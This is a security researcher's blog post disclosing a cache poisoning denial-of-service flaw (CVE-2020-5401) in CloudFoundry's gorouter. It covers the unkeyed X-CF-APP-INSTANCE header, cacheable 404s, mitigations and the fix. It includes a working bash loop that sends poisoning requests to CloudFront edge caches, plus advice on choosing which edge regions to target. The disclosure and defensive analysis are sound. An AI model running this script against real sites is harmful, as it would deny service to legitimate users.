Cache poisoning DoS in CloudFoundry gorouter (CVE-2020-5401)

February 25, 2020

I first touched on cache poisoning as a means of Denial of Service just over a year ago, when I published CORS'ing a Denial of Service via cache poisoning. That post details a technique that lets an attacker poison the Access-Control-Allow-Origin header value in cached API responses, so that any genuine CORS request to the resource is denied. Not long after, this class of vulnerability gained more traction through the different (and more impactful) techniques outlined in the excellent CPDoS.org research.

This time around, I'm detailing a similar issue, but with an even narrower scope than CPDoS via CORS - this issue affected the CloudFoundry platform, a now VMware-owned cloud offering for developing web apps, with APIs that abstract the underlying infrastructure (such as AWS or GCP). More specifically, it affected the gorouter package - the component responsible for directing web requests to specific CloudFoundry app instances.

To achieve CPDoS, one must find a way to cause an undesirable response that ends up in a front-end cache and is served to other users. Typically, a cache won't allow this if the technique relies on input provided in a standard or anticipated way, such as the query string or common HTTP headers - such input is used by the cache to generate the key for the cached copy, so only other requests with the same input receive the cached response. However, cloud systems often give advanced users and sysadmins extra abilities via custom HTTP headers, such as added diagnostic information or control over routing. Caches usually know nothing about these headers and leave them out of the key, which is where the CPDoS vulnerability for CloudFoundry could be found - in its custom X-CF-APP-INSTANCE request header.
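To make the role of the cache key concrete, here is a minimal sketch of the mechanism in Python. It is a toy model under stated assumptions, not how any real CDN is implemented: the ToyCache class, the toy_origin function, the X-Example-Routing header and the example.test host are all hypothetical names invented for illustration.

```python
from typing import Callable, Dict, Tuple

Response = Tuple[int, str]  # (status code, body)
Origin = Callable[[str, str, Dict[str, str]], Response]


class ToyCache:
    """Simplified front-end cache that keys entries on host, path and query only."""

    def __init__(self, origin: Origin) -> None:
        self.origin = origin
        self.store: Dict[Tuple[str, str], Response] = {}

    def fetch(self, host: str, path_and_query: str, headers: Dict[str, str]) -> Response:
        # Request headers are deliberately NOT part of the key (they are "unkeyed").
        key = (host, path_and_query)
        if key not in self.store:
            self.store[key] = self.origin(host, path_and_query, headers)
        return self.store[key]


def toy_origin(host: str, path_and_query: str, headers: Dict[str, str]) -> Response:
    """Hypothetical origin that returns an error whenever the custom header is present."""
    if "X-Example-Routing" in headers:
        return (404, "not found")
    return (200, "hello")


cache = ToyCache(toy_origin)

# The attacker's request carries the unkeyed header and populates the cache entry.
poisoned = cache.fetch("example.test", "/?cb=xxx", {"X-Example-Routing": "bogus"})

# A later request without the header maps to the same key and gets the stored error.
victim = cache.fetch("example.test", "/?cb=xxx", {})

# A request with a different query string maps to a different key and is unaffected.
clean = cache.fetch("example.test", "/?cb=other", {})

print(poisoned, victim, clean)
```

The point of the sketch is only that the stored error is reachable by anyone whose request produces the same key, regardless of whether they sent the header that caused it.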

This header allows the requester to target a specific app and instance using the format APP-GUID:INSTANCE-NUMBER, such as X-CF-APP-INSTANCE: aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa:1. If the GUID belongs to a running app, and the instance number points to a valid running instance, then the request will be served by that instance. However, if you feed in a bad value (like the example just given with all the a's), you would get a response back like:

HTTP/1.1 404 Not Found
Date: Tue, 25 Feb 2020 07:32:28 GMT
Content-Type: text/plain; charset=utf-8
Cache-Control: public, max-age=3600
Vary: Accept-Encoding
X-Cf-Routererror: unknown_route
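As an aside on the APP-GUID:INSTANCE-NUMBER format described above, the following is a rough Python sketch of a purely syntactic check on the header value. It is not gorouter's actual parsing logic; the parse_app_instance function and the exact GUID pattern are assumptions made for illustration.

```python
import re
from typing import Optional, Tuple

# Assumed shape: a hyphenated 8-4-4-4-12 hex GUID, a colon, then a non-negative integer.
_APP_INSTANCE_RE = re.compile(
    r"([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}):(\d+)"
)


def parse_app_instance(value: str) -> Optional[Tuple[str, int]]:
    """Return (app_guid, instance_number), or None if the value is malformed."""
    match = _APP_INSTANCE_RE.fullmatch(value.strip())
    if match is None:
        return None
    return match.group(1).lower(), int(match.group(2))


print(parse_app_instance("aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa:1"))
print(parse_app_instance("xxx:1"))
```

Note that the all-a's value passes a syntactic check like this one. Whether it maps to a running app and instance can only be decided by the router, which is why a well-formed but unknown value still reaches the error path.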

The problem with this 404 response is that HTTP 404 is cacheable by default according to RFC 7231, and in fact will be cached by default by common web cache front ends like Cloudflare and CloudFront. The Cache-Control: public, max-age=3600 header only compounds the issue, although my testing on CloudFront suggested that it was not required for the 404 error to be cached.
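The "cacheable by default" rule can be sketched as a small Python function. This is a heavily simplified reading of the HTTP caching rules for a shared cache, not the policy of any particular CDN (real products layer their own defaults on top). The status list is the one RFC 7231 gives for its own status codes; the may_store function name is an assumption for illustration.

```python
from typing import Optional

# Status codes that RFC 7231 defines as cacheable by default.
CACHEABLE_BY_DEFAULT = frozenset({200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501})


def may_store(status: int, cache_control: Optional[str] = None) -> bool:
    """Rough check of whether a shared cache may store a response."""
    directives = set()
    if cache_control:
        for part in cache_control.split(","):
            name = part.strip().split("=", 1)[0].lower()
            if name:
                directives.add(name)

    # Explicit prohibitions win for a shared cache.
    if "no-store" in directives or "private" in directives:
        return False
    # Explicit permission or explicit freshness information allows storing.
    if directives & {"public", "max-age", "s-maxage"}:
        return True
    # Otherwise fall back to the status code's default cacheability.
    return status in CACHEABLE_BY_DEFAULT


print(may_store(404))                          # no Cache-Control header at all
print(may_store(404, "public, max-age=3600"))  # the header from the response above
print(may_store(400))                          # 400 is not cacheable by default
```

Under this simplified model the 404 is storable with or without the Cache-Control header, which is consistent with the CloudFront observation, while a bare 400 is not.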

As I originally found this issue on an asset in a public bug bounty program (not yet disclosed), I sought to maximize the impact of the vulnerability and demonstrate how this could allow me to cause widespread DoS with only a handful of requests. This asset was behind CloudFront, which means we can use a resource like https://www.nexcess.net/web-tools/dns-checker/ to first collect the IP addresses of the target's edge caches, and then for each edge cache, run a script like the following:

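#!/bin/bash
# Repeatedly sends the poisoning request directly to a single edge cache.
# TARGET_HOST and IP_OF_EDGE_CACHE are placeholders to fill in.

while true
do
    # Raw HTTP request; the invalid X-CF-APP-INSTANCE value triggers the cacheable 404.
    printf 'GET /?cb=xxx HTTP/1.1\r\n'\
'Host: TARGET_HOST\r\n'\
'X-CF-APP-INSTANCE: xxx:1\r\n'\
'Connection: close\r\n'\
'\r\n'\
    | openssl s_client -ign_eof -connect IP_OF_EDGE_CACHE:443 -servername TARGET_HOST
    # Repeat every 10 seconds so the poisoned entry is refreshed.
    sleep 10
done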

This will poison the cache for the resource https://TARGET_HOST/?cb=xxx, with the edge cache IP and the target hostname substituted into the raw HTTP request and the openssl command arguments where relevant. The script re-sends the poisoning request every 10 seconds to ensure the DoS is maintained. Depending on which IPs you target, you can control which CloudFront regions are poisoned. In this example I've used what's called a cache buster - the ?cb=xxx in the query string. Because I confirmed beforehand that the query string is used in the cache key, I knew it would be safe to attack this target using the cache buster without affecting real traffic - only those requesting with the same query string would be affected. Of course, a real attacker won't be this courteous, but this technique is important when testing bounty program assets for issues like CPDoS, as you don't want to affect real users/customers.
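For testers, the cache buster idea can be sketched in Python as a helper that attaches a fresh random value to a URL, so that each test run touches a cache entry no real visitor will request. This only helps if the query string is confirmed to be part of the cache key, as it was here. The with_cache_buster function and the example.test host are hypothetical, and the cb parameter name simply mirrors the example above.

```python
import uuid
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def with_cache_buster(url: str, param: str = "cb") -> str:
    """Return the URL with a fresh random cache-buster query parameter."""
    parts = urlsplit(url)
    # Keep the existing query parameters, dropping any earlier cache buster.
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    query.append((param, uuid.uuid4().hex))
    return urlunsplit(parts._replace(query=urlencode(query)))


first = with_cache_buster("https://example.test/?a=1")
second = with_cache_buster("https://example.test/?a=1")
print(first)
print(second)
```

Each call yields a different URL, so two test runs never share a cache entry with each other or with ordinary traffic.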

In this particular instance, a specific header with a specific type of value produced an error response from a specific cloud platform, and that response was cacheable and would likely have been cached by most conforming web caching layers. The result is cache poisoning DoS - the error you raised can and will be served to other users, effectively blocking their access to the target. While it is unlikely that this specific header has a similar effect anywhere outside of CloudFoundry, I wouldn't be surprised if similar CPDoS issues are present in other cloud providers. In this case, the fix could be applied in multiple places - you could configure the caching layer to no longer cache 404 errors, or you could make sure the X-CF-APP-INSTANCE header is used in determining the cache key. Alternatively, the cloud provider could return a non-cacheable response, which is what Pivotal did in fixing this vulnerability in the gorouter component, opting for an HTTP 400 response (which, as the CPDoS.org research outlined, may still be cached, but only if the caching layer is poorly configured).
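The two cache-side mitigations mentioned above can be compared in a toy Python model. This is a sketch under stated assumptions rather than real CDN configuration: make_cache, its keyed_headers and cache_errors parameters, and toy_origin are all hypothetical, and the origin merely imitates the 404 behaviour described in this post.

```python
from typing import Callable, Dict, Sequence, Tuple

Response = Tuple[int, str]  # (status code, body)
Origin = Callable[[str, Dict[str, str]], Response]
Fetch = Callable[[str, Dict[str, str]], Response]


def make_cache(origin: Origin, keyed_headers: Sequence[str] = (), cache_errors: bool = True) -> Fetch:
    """Build a toy cache; keyed_headers and cache_errors model the two mitigations."""
    store: Dict[Tuple[str, ...], Response] = {}

    def fetch(url: str, headers: Dict[str, str]) -> Response:
        lowered = {name.lower(): value for name, value in headers.items()}
        # The key is the URL plus the value of every header configured as keyed.
        key = (url,) + tuple(lowered.get(name.lower(), "") for name in keyed_headers)
        if key in store:
            return store[key]
        response = origin(url, headers)
        if cache_errors or response[0] < 400:
            store[key] = response
        return response

    return fetch


def toy_origin(url: str, headers: Dict[str, str]) -> Response:
    """Imitates the behaviour in this post: any X-CF-APP-INSTANCE value is treated as unknown."""
    if "x-cf-app-instance" in {name.lower() for name in headers}:
        return (404, "unknown route")
    return (200, "ok")


url = "https://example.test/?cb=xxx"
bad = {"X-CF-APP-INSTANCE": "xxx:1"}

vulnerable = make_cache(toy_origin)
vulnerable(url, bad)
print(vulnerable(url, {}))  # the victim receives the cached 404

keyed = make_cache(toy_origin, keyed_headers=("X-CF-APP-INSTANCE",))
keyed(url, bad)
print(keyed(url, {}))       # different key, so the victim reaches the origin

no_errors = make_cache(toy_origin, cache_errors=False)
no_errors(url, bad)
print(no_errors(url, {}))   # the 404 was never stored
```

Either change alone is enough to stop the poisoning in this model. Keying on the header keeps error caching for everyone else, while refusing to cache errors is simpler but sends every 404 back to the origin.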

This issue was allocated CVE-2020-5401 and fixed in a recent release of the CloudFoundry gorouter package.

Update 13/03: The original bounty report regarding this vulnerability has been disclosed.